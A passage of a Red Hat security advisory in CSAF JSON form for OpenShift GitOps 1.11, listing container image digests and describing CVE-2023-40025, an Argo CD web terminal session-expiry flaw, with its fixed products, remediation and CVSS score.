"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-40025",
"cwe": {
"id": "CWE-613",
"name": "Insufficient Session Expiration"
},
"discovery_date": "2024-07-30T04:26:12+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2301445"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Argo CD. Affected versions of Argo CD have a bug where open web terminal sessions do not expire. This bug allows users to send WebSocket messages even if the token has expired. The most straightforward scenario occurs when a user opens the terminal view and leaves it open for an extended period. This flaw allows users to view sensitive information even after logging out.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "argo-cd: Argo CD web terminal session doesn\u0027t expire",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-40025"
},
{
"category": "external",
"summary": "RHBZ#2301445",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301445"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-40025",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40025"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-40025",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40025"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-c8xw-vjgf-94hr",
"url": "https://github.com/advisories/GHSA-c8xw-vjgf-94hr"
}
],
"release_date": "2023-08-24T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4972"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
